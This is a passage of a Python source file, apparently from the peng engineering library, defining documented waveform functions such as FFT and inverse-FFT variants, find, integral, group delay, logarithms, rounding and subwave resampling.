npoints="None|(int,>=1)",
indep_min="None|number",
indep_max="None|number",
)
def fftm(wave, npoints=None, indep_min=None, indep_max=None):
r"""
Return the magnitude of the Fast Fourier Transform of a waveform.
:param wave: Waveform
:type wave: :py:class:`peng.eng.Waveform`
:param npoints: Number of points to use in the transform. If **npoints**
is less than the size of the independent variable vector
the waveform is truncated; if **npoints** is greater than
the size of the independent variable vector, the waveform
is zero-padded
:type npoints: positive integer
:param indep_min: Independent vector start point of computation
:type indep_min: integer or float
:param indep_max: Independent vector stop point of computation
:type indep_max: integer or float
:rtype: :py:class:`peng.eng.Waveform`
.. [[[cog cog.out(exobj_eng.get_sphinx_autodoc(raised=True)) ]]]
.. Auto-generated exceptions documentation for
.. peng.wave_functions.fftm
:raises:
* RuntimeError (Argument \`indep_max\` is not valid)
* RuntimeError (Argument \`indep_min\` is not valid)
* RuntimeError (Argument \`npoints\` is not valid)
* RuntimeError (Argument \`wave\` is not valid)
* RuntimeError (Incongruent \`indep_min\` and \`indep_max\`
arguments)
* RuntimeError (Non-uniform sampling)
.. [[[end]]]
"""
return abs(fft(wave, npoints, indep_min, indep_max))
@pexdoc.pcontracts.contract(
wave=Waveform,
npoints="None|(int,>=1)",
indep_min="None|number",
indep_max="None|number",
unwrap=bool,
rad=bool,
)
def fftp(wave, npoints=None, indep_min=None, indep_max=None, unwrap=True, rad=True):
r"""
Return the phase of the Fast Fourier Transform of a waveform.
:param wave: Waveform
:type wave: :py:class:`peng.eng.Waveform`
:param npoints: Number of points to use in the transform. If **npoints**
is less than the size of the independent variable vector
the waveform is truncated; if **npoints** is greater than
the size of the independent variable vector, the waveform
is zero-padded
:type npoints: positive integer
:param indep_min: Independent vector start point of computation
:type indep_min: integer or float
:param indep_max: Independent vector stop point of computation
:type indep_max: integer or float
:param unwrap: Flag that indicates whether phase should change phase shifts
to their :code:`2*pi` complement (True) or not (False)
:type unwrap: boolean
:param rad: Flag that indicates whether phase should be returned in radians
(True) or degrees (False)
:type rad: boolean
:rtype: :py:class:`peng.eng.Waveform`
.. [[[cog cog.out(exobj_eng.get_sphinx_autodoc(raised=True)) ]]]
.. Auto-generated exceptions documentation for
.. peng.wave_functions.fftp
:raises:
* RuntimeError (Argument \`indep_max\` is not valid)
* RuntimeError (Argument \`indep_min\` is not valid)
* RuntimeError (Argument \`npoints\` is not valid)
* RuntimeError (Argument \`rad\` is not valid)
* RuntimeError (Argument \`unwrap\` is not valid)
* RuntimeError (Argument \`wave\` is not valid)
* RuntimeError (Incongruent \`indep_min\` and \`indep_max\`
arguments)
* RuntimeError (Non-uniform sampling)
.. [[[end]]]
"""
return phase(fft(wave, npoints, indep_min, indep_max), unwrap=unwrap, rad=rad)
@pexdoc.pcontracts.contract(
wave=Waveform,
npoints="None|(int,>=1)",
indep_min="None|number",
indep_max="None|number",
)
def fftr(wave, npoints=None, indep_min=None, indep_max=None):
r"""
Return the real part of the Fast Fourier Transform of a waveform.
:param wave: Waveform
:type wave: :py:class:`peng.eng.Waveform`
:param npoints: Number of points to use in the transform. If **npoints**
is less than the size of the independent variable vector
the waveform is truncated; if **npoints** is greater than
the size of the independent variable vector, the waveform
is zero-padded
:type npoints: positive integer
:param indep_min: Independent vector start point of computation
:type indep_min: integer or float
:param indep_max: Independent vector stop point of computation
:type indep_max: integer or float
:rtype: :py:class:`peng.eng.Waveform`
.. [[[cog cog.out(exobj_eng.get_sphinx_autodoc(raised=True)) ]]]
.. Auto-generated exceptions documentation for
.. peng.wave_functions.fftr
:raises:
* RuntimeError (Argument \`indep_max\` is not valid)
* RuntimeError (Argument \`indep_min\` is not valid)
* RuntimeError (Argument \`npoints\` is not valid)
* RuntimeError (Argument \`wave\` is not valid)
* RuntimeError (Incongruent \`indep_min\` and \`indep_max\`
arguments)
* RuntimeError (Non-uniform sampling)
.. [[[end]]]
"""
return real(fft(wave, npoints, indep_min, indep_max))
@pexdoc.pcontracts.contract(
wave=Waveform,
dep_var="number",
der="None|(int,>=-1,<=+1)",
inst="int,>0",
indep_min="None|number",
indep_max="None|number",
)
def find(wave, dep_var, der=None, inst=1, indep_min=None, indep_max=None):
r"""
Return the independent variable point associated with a dependent variable point.
If the dependent variable point is not in the dependent variable vector the
independent variable vector point is obtained by linear interpolation
:param wave: Waveform
:type wave: :py:class:`peng.eng.Waveform`
:param dep_var: Dependent vector value to search for
:type dep_var: integer, float or complex
:param der: Dependent vector derivative filter. If +1 only independent
vector points that have positive derivatives when crossing
the requested dependent vector point are returned; if -1 only
independent vector points that have negative derivatives when
crossing the requested dependent vector point are returned;
if 0 only independent vector points that have null derivatives
when crossing the requested dependent vector point are
returned; otherwise if None all independent vector points are
returned regardless of the dependent vector derivative. The
derivative of the first and last point of the waveform is
assumed to be null
:type der: integer, float or complex
:param inst: Instance number filter. If, for example, **inst** equals 3,
then the independent variable vector point at which the
dependent variable vector equals the requested value for the
third time is returned
:type inst: positive integer
:param indep_min: Independent vector start point of computation
:type indep_min: integer or float
:param indep_max: Independent vector stop point of computation
:type indep_max: integer or float
:rtype: integer, float or None if the dependent variable point is not found
.. [[[cog cog.out(exobj_eng.get_sphinx_autodoc(raised=True)) ]]]
.. Auto-generated exceptions documentation for
.. peng.wave_functions.find
:raises:
* RuntimeError (Argument \`dep_var\` is not valid)
* RuntimeError (Argument \`der\` is not valid)
* RuntimeError (Argument \`indep_max\` is not valid)
* RuntimeError (Argument \`indep_min\` is not valid)
* RuntimeError (Argument \`inst\` is not valid)
* RuntimeError (Argument \`wave\` is not valid)
* RuntimeError (Incongruent \`indep_min\` and \`indep_max\`
arguments)
.. [[[end]]]
"""
# pylint: disable=C0325,R0914,W0613
ret = copy.copy(wave)
_bound_waveform(ret, indep_min, indep_max)
close_min = np.isclose(min(ret._dep_vector), dep_var, FP_RTOL, FP_ATOL)
close_max = np.isclose(max(ret._dep_vector), dep_var, FP_RTOL, FP_ATOL)
if ((np.amin(ret._dep_vector) > dep_var) and (not close_min)) or (
(np.amax(ret._dep_vector) < dep_var) and (not close_max)
):
return None
cross_wave = ret._dep_vector - dep_var
sign_wave = np.sign(cross_wave)
exact_idx = np.where(np.isclose(ret._dep_vector, dep_var, FP_RTOL, FP_ATOL))[0]
# Locations where dep_vector crosses dep_var or it is equal to it
left_idx = np.where(np.diff(sign_wave))[0]
# Remove elements to the left of exact matches
left_idx = np.setdiff1d(left_idx, exact_idx)
left_idx = np.setdiff1d(left_idx, exact_idx - 1)
right_idx = left_idx + 1 if left_idx.size else np.array([])
indep_var = ret._indep_vector[exact_idx] if exact_idx.size else np.array([])
dvector = np.zeros(exact_idx.size).astype(int) if exact_idx.size else np.array([])
if left_idx.size and (ret.interp == "STAIRCASE"):
idvector = (
2.0 * (ret._dep_vector[right_idx] > ret._dep_vector[left_idx]).astype(int)
- 1
)
if indep_var.size:
indep_var = np.concatenate((indep_var, ret._indep_vector[right_idx]))
dvector = np.concatenate((dvector, idvector))
sidx = np.argsort(indep_var)
indep_var = indep_var[sidx]
dvector = dvector[sidx]
else:
indep_var = ret._indep_vector[right_idx]
dvector = idvector
elif left_idx.size:
y_left = ret._dep_vector[left_idx]
y_right = ret._dep_vector[right_idx]
x_left = ret._indep_vector[left_idx]
x_right = ret._indep_vector[right_idx]
slope = ((y_left - y_right) / (x_left - x_right)).astype(float)
# y = y0+slope*(x-x0) => x0+(y-y0)/slope
if indep_var.size:
indep_var = np.concatenate(
(indep_var, x_left + ((dep_var - y_left) / slope))
)
dvector = np.concatenate((dvector, np.where(slope > 0, 1, -1)))
sidx = np.argsort(indep_var)
indep_var = indep_var[sidx]
dvector = dvector[sidx]
else:
indep_var = x_left + ((dep_var - y_left) / slope)
dvector = np.where(slope > 0, +1, -1)
if der is not None:
indep_var = np.extract(dvector == der, indep_var)
return indep_var[inst - 1] if inst <= indep_var.size else None
@pexdoc.pcontracts.contract(wave=Waveform)
def floor(wave):
r"""
Return the floor of a waveform's dependent variable vector.
:param wave: Waveform
:type wave: :py:class:`peng.eng.Waveform`
:rtype: :py:class:`peng.eng.Waveform`
.. [[[cog cog.out(exobj_eng.get_sphinx_autodoc()) ]]]
.. Auto-generated exceptions documentation for
.. peng.wave_functions.floor
:raises: RuntimeError (Argument \`wave\` is not valid)
.. [[[end]]]
"""
return _operation(wave, "floor", wave.dep_units, np.floor)
@pexdoc.pcontracts.contract(
wave=Waveform,
npoints="None|(int,>=1)",
indep_min="None|number",
indep_max="None|number",
)
def ifft(wave, npoints=None, indep_min=None, indep_max=None):
r"""
Return the inverse Fast Fourier Transform of a waveform.
:param wave: Waveform
:type wave: :py:class:`peng.eng.Waveform`
:param npoints: Number of points to use in the transform. If **npoints**
is less than the size of the independent variable vector
the waveform is truncated; if **npoints** is greater than
the size of the independent variable vector, the waveform
is zero-padded
:type npoints: positive integer
:param indep_min: Independent vector start point of computation
:type indep_min: integer or float
:param indep_max: Independent vector stop point of computation
:type indep_max: integer or float
:rtype: :py:class:`peng.eng.Waveform`
.. [[[cog cog.out(exobj_eng.get_sphinx_autodoc(raised=True)) ]]]
.. Auto-generated exceptions documentation for
.. peng.wave_functions.ifft
:raises:
* RuntimeError (Argument \`indep_max\` is not valid)
* RuntimeError (Argument \`indep_min\` is not valid)
* RuntimeError (Argument \`npoints\` is not valid)
* RuntimeError (Argument \`wave\` is not valid)
* RuntimeError (Incongruent \`indep_min\` and \`indep_max\`
arguments)
* RuntimeError (Non-uniform frequency spacing)
.. [[[end]]]
"""
ret = copy.copy(wave)
_bound_waveform(ret, indep_min, indep_max)
npoints = npoints or ret._indep_vector.size
spoints = min(ret._indep_vector.size, npoints)
sdiff = np.diff(ret._indep_vector[:spoints])
finc = sdiff[0]
cond = not np.all(np.isclose(sdiff, finc * np.ones(spoints - 1), FP_RTOL, FP_ATOL))
pexdoc.addex(RuntimeError, "Non-uniform frequency spacing", cond)
fs = (npoints - 1) * finc
tinc = 1 / float(fs)
tend = 1 / float(finc)
indep_vector = _barange(0, tend, tinc)
dep_vector = np.fft.ifft(ret._dep_vector, npoints)
return Waveform(
indep_vector=indep_vector,
dep_vector=dep_vector,
dep_name="ifft({0})".format(ret.dep_name),
indep_scale="LINEAR",
dep_scale="LINEAR",
indep_units="sec",
dep_units="",
)
@pexdoc.pcontracts.contract(
wave=Waveform,
npoints="None|(int,>=1)",
indep_min="None|number",
indep_max="None|number",
)
def ifftdb(wave, npoints=None, indep_min=None, indep_max=None):
r"""
Return the inverse Fast Fourier Transform of a waveform.
The dependent variable vector of the returned waveform is expressed in decibels
:param wave: Waveform
:type wave: :py:class:`peng.eng.Waveform`
:param npoints: Number of points to use in the transform. If **npoints**
is less than the size of the independent variable vector
the waveform is truncated; if **npoints** is greater than
the size of the independent variable vector, the waveform
is zero-padded
:type npoints: positive integer
:param indep_min: Independent vector start point of computation
:type indep_min: integer or float
:param indep_max: Independent vector stop point of computation
:type indep_max: integer or float
:rtype: :py:class:`peng.eng.Waveform`
.. [[[cog cog.out(exobj_eng.get_sphinx_autodoc(raised=True)) ]]]
.. Auto-generated exceptions documentation for
.. peng.wave_functions.ifftdb
:raises:
* RuntimeError (Argument \`indep_max\` is not valid)
* RuntimeError (Argument \`indep_min\` is not valid)
* RuntimeError (Argument \`npoints\` is not valid)
* RuntimeError (Argument \`wave\` is not valid)
* RuntimeError (Incongruent \`indep_min\` and \`indep_max\`
arguments)
* RuntimeError (Non-uniform frequency spacing)
.. [[[end]]]
"""
return db(ifft(wave, npoints, indep_min, indep_max))
@pexdoc.pcontracts.contract(
wave=Waveform,
npoints="None|(int,>=1)",
indep_min="None|number",
indep_max="None|number",
)
def iffti(wave, npoints=None, indep_min=None, indep_max=None):
r"""
Return the imaginary part of the inverse Fast Fourier Transform of a waveform.
:param wave: Waveform
:type wave: :py:class:`peng.eng.Waveform`
:param npoints: Number of points to use in the transform. If **npoints**
is less than the size of the independent variable vector
the waveform is truncated; if **npoints** is greater than
the size of the independent variable vector, the waveform
is zero-padded
:type npoints: positive integer
:param indep_min: Independent vector start point of computation
:type indep_min: integer or float
:param indep_max: Independent vector stop point of computation
:type indep_max: integer or float
:rtype: :py:class:`peng.eng.Waveform`
.. [[[cog cog.out(exobj_eng.get_sphinx_autodoc(raised=True)) ]]]
.. Auto-generated exceptions documentation for
.. peng.wave_functions.iffti
:raises:
* RuntimeError (Argument \`indep_max\` is not valid)
* RuntimeError (Argument \`indep_min\` is not valid)
* RuntimeError (Argument \`npoints\` is not valid)
* RuntimeError (Argument \`wave\` is not valid)
* RuntimeError (Incongruent \`indep_min\` and \`indep_max\`
arguments)
* RuntimeError (Non-uniform frequency spacing)
.. [[[end]]]
"""
return imag(ifft(wave, npoints, indep_min, indep_max))
@pexdoc.pcontracts.contract(
wave=Waveform,
npoints="None|(int,>=1)",
indep_min="None|number",
indep_max="None|number",
)
def ifftm(wave, npoints=None, indep_min=None, indep_max=None):
r"""
Return the magnitude of the inverse Fast Fourier Transform of a waveform.
:param wave: Waveform
:type wave: :py:class:`peng.eng.Waveform`
:param npoints: Number of points to use in the transform. If **npoints**
is less than the size of the independent variable vector
the waveform is truncated; if **npoints** is greater than
the size of the independent variable vector, the waveform
is zero-padded
:type npoints: positive integer
:param indep_min: Independent vector start point of computation
:type indep_min: integer or float
:param indep_max: Independent vector stop point of computation
:type indep_max: integer or float
:rtype: :py:class:`peng.eng.Waveform`
.. [[[cog cog.out(exobj_eng.get_sphinx_autodoc(raised=True)) ]]]
.. Auto-generated exceptions documentation for
.. peng.wave_functions.ifftm
:raises:
* RuntimeError (Argument \`indep_max\` is not valid)
* RuntimeError (Argument \`indep_min\` is not valid)
* RuntimeError (Argument \`npoints\` is not valid)
* RuntimeError (Argument \`wave\` is not valid)
* RuntimeError (Incongruent \`indep_min\` and \`indep_max\`
arguments)
* RuntimeError (Non-uniform frequency spacing)
.. [[[end]]]
"""
return abs(ifft(wave, npoints, indep_min, indep_max))
@pexdoc.pcontracts.contract(
wave=Waveform,
npoints="None|(int,>=1)",
indep_min="None|number",
indep_max="None|number",
unwrap=bool,
rad=bool,
)
def ifftp(wave, npoints=None, indep_min=None, indep_max=None, unwrap=True, rad=True):
r"""
Return the phase of the inverse Fast Fourier Transform of a waveform.
:param wave: Waveform
:type wave: :py:class:`peng.eng.Waveform`
:param npoints: Number of points to use in the transform. If **npoints**
is less than the size of the independent variable vector
the waveform is truncated; if **npoints** is greater than
the size of the independent variable vector, the waveform
is zero-padded
:type npoints: positive integer
:param indep_min: Independent vector start point of computation
:type indep_min: integer or float
:param indep_max: Independent vector stop point of computation
:type indep_max: integer or float
:param unwrap: Flag that indicates whether phase should change phase shifts
to their :code:`2*pi` complement (True) or not (False)
:type unwrap: boolean
:param rad: Flag that indicates whether phase should be returned in radians
(True) or degrees (False)
:type rad: boolean
:rtype: :py:class:`peng.eng.Waveform`
.. [[[cog cog.out(exobj_eng.get_sphinx_autodoc(raised=True)) ]]]
.. Auto-generated exceptions documentation for
.. peng.wave_functions.ifftp
:raises:
* RuntimeError (Argument \`indep_max\` is not valid)
* RuntimeError (Argument \`indep_min\` is not valid)
* RuntimeError (Argument \`npoints\` is not valid)
* RuntimeError (Argument \`rad\` is not valid)
* RuntimeError (Argument \`unwrap\` is not valid)
* RuntimeError (Argument \`wave\` is not valid)
* RuntimeError (Incongruent \`indep_min\` and \`indep_max\`
arguments)
* RuntimeError (Non-uniform frequency spacing)
.. [[[end]]]
"""
return phase(ifft(wave, npoints, indep_min, indep_max), unwrap=unwrap, rad=rad)
@pexdoc.pcontracts.contract(
wave=Waveform,
npoints="None|(int,>=1)",
indep_min="None|number",
indep_max="None|number",
)
def ifftr(wave, npoints=None, indep_min=None, indep_max=None):
r"""
Return the real part of the inverse Fast Fourier Transform of a waveform.
:param wave: Waveform
:type wave: :py:class:`peng.eng.Waveform`
:param npoints: Number of points to use in the transform. If **npoints**
is less than the size of the independent variable vector
the waveform is truncated; if **npoints** is greater than
the size of the independent variable vector, the waveform
is zero-padded
:type npoints: positive integer
:param indep_min: Independent vector start point of computation
:type indep_min: integer or float
:param indep_max: Independent vector stop point of computation
:type indep_max: integer or float
:rtype: :py:class:`peng.eng.Waveform`
.. [[[cog cog.out(exobj_eng.get_sphinx_autodoc(raised=True)) ]]]
.. Auto-generated exceptions documentation for
.. peng.wave_functions.ifftr
:raises:
* RuntimeError (Argument \`indep_max\` is not valid)
* RuntimeError (Argument \`indep_min\` is not valid)
* RuntimeError (Argument \`npoints\` is not valid)
* RuntimeError (Argument \`wave\` is not valid)
* RuntimeError (Incongruent \`indep_min\` and \`indep_max\`
arguments)
* RuntimeError (Non-uniform frequency spacing)
.. [[[end]]]
"""
return real(ifft(wave, npoints, indep_min, indep_max))
@pexdoc.pcontracts.contract(wave=Waveform)
def imag(wave):
r"""
Return the imaginary part of a waveform's dependent variable vector.
:param wave: Waveform
:type wave: :py:class:`peng.eng.Waveform`
:rtype: :py:class:`peng.eng.Waveform`
.. [[[cog cog.out(exobj_eng.get_sphinx_autodoc()) ]]]
.. Auto-generated exceptions documentation for
.. peng.wave_functions.imag
:raises: RuntimeError (Argument \`wave\` is not valid)
.. [[[end]]]
"""
return _operation(wave, "imag", wave.dep_units, np.imag)
@pexdoc.pcontracts.contract(
wave=Waveform, indep_min="None|number", indep_max="None|number"
)
def integral(wave, indep_min=None, indep_max=None):
r"""
Return the running integral of a waveform's dependent variable vector.
The method used is the `trapezoidal
<https://en.wikipedia.org/wiki/Trapezoidal_rule>`_ method
:param wave: Waveform
:type wave: :py:class:`peng.eng.Waveform`
:param indep_min: Independent vector start point of computation
:type indep_min: integer or float
:param indep_max: Independent vector stop point of computation
:type indep_max: integer or float
:rtype: :py:class:`peng.eng.Waveform`
.. [[[cog cog.out(exobj_eng.get_sphinx_autodoc(raised=True)) ]]]
.. Auto-generated exceptions documentation for
.. peng.wave_functions.integral
:raises:
* RuntimeError (Argument \`indep_max\` is not valid)
* RuntimeError (Argument \`indep_min\` is not valid)
* RuntimeError (Argument \`wave\` is not valid)
* RuntimeError (Incongruent \`indep_min\` and \`indep_max\`
arguments)
.. [[[end]]]
"""
ret = copy.copy(wave)
_bound_waveform(ret, indep_min, indep_max)
ret._dep_vector = _running_area(ret._indep_vector, ret._dep_vector)
ret.dep_name = "integral({0})".format(ret._dep_name)
ret.dep_units = _build_units(ret.indep_units, ret.dep_units, "*")
return ret
@pexdoc.pcontracts.contract(wave=Waveform)
def group_delay(wave):
r"""
Return the group delay of a waveform.
:param wave: Waveform
:type wave: :py:class:`peng.eng.Waveform`
:rtype: :py:class:`peng.eng.Waveform`
.. [[[cog cog.out(exobj_eng.get_sphinx_autodoc(raised=True)) ]]]
.. Auto-generated exceptions documentation for
.. peng.wave_functions.group_delay
:raises: RuntimeError (Argument \`wave\` is not valid)
.. [[[end]]]
"""
ret = -derivative(phase(wave, unwrap=True) / (2 * math.pi))
ret.dep_name = "group_delay({0})".format(wave.dep_name)
ret.dep_units = "sec"
return ret
@pexdoc.pcontracts.contract(wave=Waveform)
def log(wave):
r"""
Return the natural logarithm of a waveform's dependent variable vector.
:param wave: Waveform
:type wave: :py:class:`peng.eng.Waveform`
:rtype: :py:class:`peng.eng.Waveform`
.. [[[cog cog.out(exobj_eng.get_sphinx_autodoc()) ]]]
.. Auto-generated exceptions documentation for peng.wave_functions.log
:raises:
* RuntimeError (Argument \`wave\` is not valid)
* ValueError (Math domain error)
.. [[[end]]]
"""
pexdoc.exh.addex(
ValueError, "Math domain error", bool((min(wave._dep_vector) <= 0))
)
return _operation(wave, "log", "", np.log)
@pexdoc.pcontracts.contract(wave=Waveform)
def log10(wave):
r"""
Return the base 10 logarithm of a waveform's dependent variable vector.
:param wave: Waveform
:type wave: :py:class:`peng.eng.Waveform`
:rtype: :py:class:`peng.eng.Waveform`
.. [[[cog cog.out(exobj_eng.get_sphinx_autodoc()) ]]]
.. Auto-generated exceptions documentation for
.. peng.wave_functions.log10
:raises:
* RuntimeError (Argument \`wave\` is not valid)
* ValueError (Math domain error)
.. [[[end]]]
"""
pexdoc.exh.addex(
ValueError, "Math domain error", bool((min(wave._dep_vector) <= 0))
)
return _operation(wave, "log10", "", np.log10)
@pexdoc.pcontracts.contract(
wave=Waveform, indep_min="None|number", indep_max="None|number"
)
def naverage(wave, indep_min=None, indep_max=None):
r"""
Return the numerical average of a waveform's dependent variable vector.
:param wave: Waveform
:type wave: :py:class:`peng.eng.Waveform`
:param indep_min: Independent vector start point of computation
:type indep_min: integer or float
:param indep_max: Independent vector stop point of computation
:type indep_max: integer or float
:rtype: :py:class:`peng.eng.Waveform`
.. [[[cog cog.out(exobj_eng.get_sphinx_autodoc(raised=True)) ]]]
.. Auto-generated exceptions documentation for
.. peng.wave_functions.naverage
:raises:
* RuntimeError (Argument \`indep_max\` is not valid)
* RuntimeError (Argument \`indep_min\` is not valid)
* RuntimeError (Argument \`wave\` is not valid)
* RuntimeError (Incongruent \`indep_min\` and \`indep_max\`
arguments)
.. [[[end]]]
"""
ret = copy.copy(wave)
_bound_waveform(ret, indep_min, indep_max)
delta_x = ret._indep_vector[-1] - ret._indep_vector[0]
return np.trapz(ret._dep_vector, x=ret._indep_vector) / delta_x
@pexdoc.pcontracts.contract(
wave=Waveform, indep_min="None|number", indep_max="None|number"
)
def nintegral(wave, indep_min=None, indep_max=None):
r"""
Return the numerical integral of a waveform's dependent variable vector.
The method used is the `trapezoidal
<https://en.wikipedia.org/wiki/Trapezoidal_rule>`_ method
:param wave: Waveform
:type wave: :py:class:`peng.eng.Waveform`
:param indep_min: Independent vector start point of computation
:type indep_min: integer or float
:param indep_max: Independent vector stop point of computation
:type indep_max: integer or float
:rtype: float
.. [[[cog cog.out(exobj_eng.get_sphinx_autodoc(raised=True)) ]]]
.. Auto-generated exceptions documentation for
.. peng.wave_functions.nintegral
:raises:
* RuntimeError (Argument \`indep_max\` is not valid)
* RuntimeError (Argument \`indep_min\` is not valid)
* RuntimeError (Argument \`wave\` is not valid)
* RuntimeError (Incongruent \`indep_min\` and \`indep_max\`
arguments)
.. [[[end]]]
"""
ret = copy.copy(wave)
_bound_waveform(ret, indep_min, indep_max)
return np.trapz(ret._dep_vector, ret._indep_vector)
@pexdoc.pcontracts.contract(
wave=Waveform, indep_min="None|number", indep_max="None|number"
)
def nmax(wave, indep_min=None, indep_max=None):
r"""
Return the maximum of a waveform's dependent variable vector.
:param wave: Waveform
:type wave: :py:class:`peng.eng.Waveform`
:param indep_min: Independent vector start point of computation
:type indep_min: integer or float
:param indep_max: Independent vector stop point of computation
:type indep_max: integer or float
:rtype: float
.. [[[cog cog.out(exobj_eng.get_sphinx_autodoc(raised=True)) ]]]
.. Auto-generated exceptions documentation for
.. peng.wave_functions.nmax
:raises:
* RuntimeError (Argument \`indep_max\` is not valid)
* RuntimeError (Argument \`indep_min\` is not valid)
* RuntimeError (Argument \`wave\` is not valid)
* RuntimeError (Incongruent \`indep_min\` and \`indep_max\`
arguments)
.. [[[end]]]
"""
ret = copy.copy(wave)
_bound_waveform(ret, indep_min, indep_max)
return np.max(ret._dep_vector)
@pexdoc.pcontracts.contract(
wave=Waveform, indep_min="None|number", indep_max="None|number"
)
def nmin(wave, indep_min=None, indep_max=None):
r"""
Return the minimum of a waveform's dependent variable vector.
:param wave: Waveform
:type wave: :py:class:`peng.eng.Waveform`
:param indep_min: Independent vector start point of computation
:type indep_min: integer or float
:param indep_max: Independent vector stop point of computation
:type indep_max: integer or float
:rtype: float
.. [[[cog cog.out(exobj_eng.get_sphinx_autodoc(raised=True)) ]]]
.. Auto-generated exceptions documentation for
.. peng.wave_functions.nmin
:raises:
* RuntimeError (Argument \`indep_max\` is not valid)
* RuntimeError (Argument \`indep_min\` is not valid)
* RuntimeError (Argument \`wave\` is not valid)
* RuntimeError (Incongruent \`indep_min\` and \`indep_max\`
arguments)
.. [[[end]]]
"""
ret = copy.copy(wave)
_bound_waveform(ret, indep_min, indep_max)
return np.min(ret._dep_vector)
@pexdoc.pcontracts.contract(wave=Waveform, unwrap=bool, rad=bool)
def phase(wave, unwrap=True, rad=True):
r"""
Return the phase of a waveform's dependent variable vector.
:param wave: Waveform
:type wave: :py:class:`peng.eng.Waveform`
:param unwrap: Flag that indicates whether phase should change phase shifts
to their :code:`2*pi` complement (True) or not (False)
:type unwrap: boolean
:param rad: Flag that indicates whether phase should be returned in radians
(True) or degrees (False)
:type rad: boolean
:rtype: :py:class:`peng.eng.Waveform`
.. [[[cog cog.out(exobj_eng.get_sphinx_autodoc()) ]]]
.. Auto-generated exceptions documentation for
.. peng.wave_functions.phase
:raises:
* RuntimeError (Argument \`rad\` is not valid)
* RuntimeError (Argument \`unwrap\` is not valid)
* RuntimeError (Argument \`wave\` is not valid)
.. [[[end]]]
"""
ret = copy.copy(wave)
ret.dep_units = "rad" if rad else "deg"
ret.dep_name = "phase({0})".format(ret.dep_name)
ret._dep_vector = (
np.unwrap(np.angle(ret._dep_vector)) if unwrap else np.angle(ret._dep_vector)
)
if not rad:
ret._dep_vector = np.rad2deg(ret._dep_vector)
return ret
@pexdoc.pcontracts.contract(wave=Waveform)
def real(wave):
r"""
Return the real part of a waveform's dependent variable vector.
:param wave: Waveform
:type wave: :py:class:`peng.eng.Waveform`
:rtype: :py:class:`peng.eng.Waveform`
.. [[[cog cog.out(exobj_eng.get_sphinx_autodoc()) ]]]
.. Auto-generated exceptions documentation for
.. peng.wave_functions.real
:raises: RuntimeError (Argument \`wave\` is not valid)
.. [[[end]]]
"""
return _operation(wave, "real", wave.dep_units, np.real)
@pexdoc.pcontracts.contract(wave=Waveform, decimals="int,>=0")
def round(wave, decimals=0):
r"""
Round a waveform's dependent variable vector to a given number of decimal places.
:param wave: Waveform
:type wave: :py:class:`peng.eng.Waveform`
:param decimals: Number of decimals to round to
:type decimals: integer
:rtype: :py:class:`peng.eng.Waveform`
.. [[[cog cog.out(exobj_eng.get_sphinx_autodoc()) ]]]
.. Auto-generated exceptions documentation for
.. peng.wave_functions.round
:raises:
* RuntimeError (Argument \`decimals\` is not valid)
* RuntimeError (Argument \`wave\` is not valid)
.. [[[end]]]
"""
# pylint: disable=W0622
pexdoc.exh.addex(
TypeError,
"Cannot convert complex to integer",
wave._dep_vector.dtype.name.startswith("complex"),
)
ret = copy.copy(wave)
ret.dep_name = "round({0}, {1})".format(ret.dep_name, decimals)
ret._dep_vector = np.round(wave._dep_vector, decimals)
return ret
@pexdoc.pcontracts.contract(wave=Waveform)
def sin(wave):
r"""
Return the sine of a waveform's dependent variable vector.
:param wave: Waveform
:type wave: :py:class:`peng.eng.Waveform`
:rtype: :py:class:`peng.eng.Waveform`
.. [[[cog cog.out(exobj_eng.get_sphinx_autodoc()) ]]]
.. Auto-generated exceptions documentation for peng.wave_functions.sin
:raises: RuntimeError (Argument \`wave\` is not valid)
.. [[[end]]]
"""
return _operation(wave, "sin", "", np.sin)
@pexdoc.pcontracts.contract(wave=Waveform)
def sinh(wave):
r"""
Return the hyperbolic sine of a waveform's dependent variable vector.
:param wave: Waveform
:type wave: :py:class:`peng.eng.Waveform`
:rtype: :py:class:`peng.eng.Waveform`
.. [[[cog cog.out(exobj_eng.get_sphinx_autodoc()) ]]]
.. Auto-generated exceptions documentation for
.. peng.wave_functions.sinh
:raises: RuntimeError (Argument \`wave\` is not valid)
.. [[[end]]]
"""
return _operation(wave, "sinh", "", np.sinh)
@pexdoc.pcontracts.contract(wave=Waveform)
def sqrt(wave):
r"""
Return the square root of a waveform's dependent variable vector.
:param wave: Waveform
:type wave: :py:class:`peng.eng.Waveform`
:rtype: :py:class:`peng.eng.Waveform`
.. [[[cog cog.out(exobj_eng.get_sphinx_autodoc()) ]]]
.. Auto-generated exceptions documentation for
.. peng.wave_functions.sqrt
:raises: RuntimeError (Argument \`wave\` is not valid)
.. [[[end]]]
"""
dep_units = "{0}**0.5".format(wave.dep_units)
return _operation(wave, "sqrt", dep_units, np.sqrt)
@pexdoc.pcontracts.contract(
wave=Waveform,
dep_name="str|None",
indep_min="None|number",
indep_max="None|number",
indep_step="None|number",
)
def subwave(wave, dep_name=None, indep_min=None, indep_max=None, indep_step=None):
r"""
Return a waveform that is a sub-set of a waveform, potentially re-sampled.
:param wave: Waveform
:type wave: :py:class:`peng.eng.Waveform`
:param dep_name: Independent variable name
:type dep_name: `NonNullString <https://pexdoc.readthedocs.io/en/stable/
ptypes.html#nonnullstring>`_
:param indep_min: Independent vector start point of computation
:type indep_min: integer or float
:param indep_max: Independent vector stop point of computation
:type indep_max: integer or float
:param indep_step: Independent vector step
:type indep_step: integer or float
:rtype: :py:class:`peng.eng.Waveform`
.. [[[cog cog.out(exobj_eng.get_sphinx_autodoc(raised=True)) ]]]
.. Auto-generated exceptions documentation for
.. peng.wave_functions.subwave
:raises:
* RuntimeError (Argument \`dep_name\` is not valid)
* RuntimeError (Argument \`indep_max\` is not valid)
* RuntimeError (Argument \`indep_min\` is not valid)
* RuntimeError (Argument \`indep_step\` is greater than independent
vector range)
* RuntimeError (Argument \`indep_step\` is not valid)
* RuntimeError (Argument \`wave\` is not valid)
* RuntimeError (Incongruent \`indep_min\` and \`indep_max\`
arguments)
.. [[[end]]]
"""
ret = copy.copy(wave)
if dep_name is not None:
ret.dep_name = dep_name
_bound_waveform(ret, indep_min, indep_max)
pexdoc.addai("indep_step", bool((indep_step is not None) and (indep_step <= 0)))
exmsg = "Argument `indep_step` is greater than independent vector range"
cond = bool(
(indep_step is not None)
and (indep_step > ret._indep_vector[-1] - ret._indep_vector[0])
)
pexdoc.addex(RuntimeError, exmsg, cond)
if indep_step:
indep_vector = _barange(indep_min, indep_max, indep_step)
dep_vector = _interp_dep_vector(ret, indep_vector)
ret._set_indep_vector(indep_vector, check=False)
ret._set_dep_vector(dep_vector, check=False)
return ret
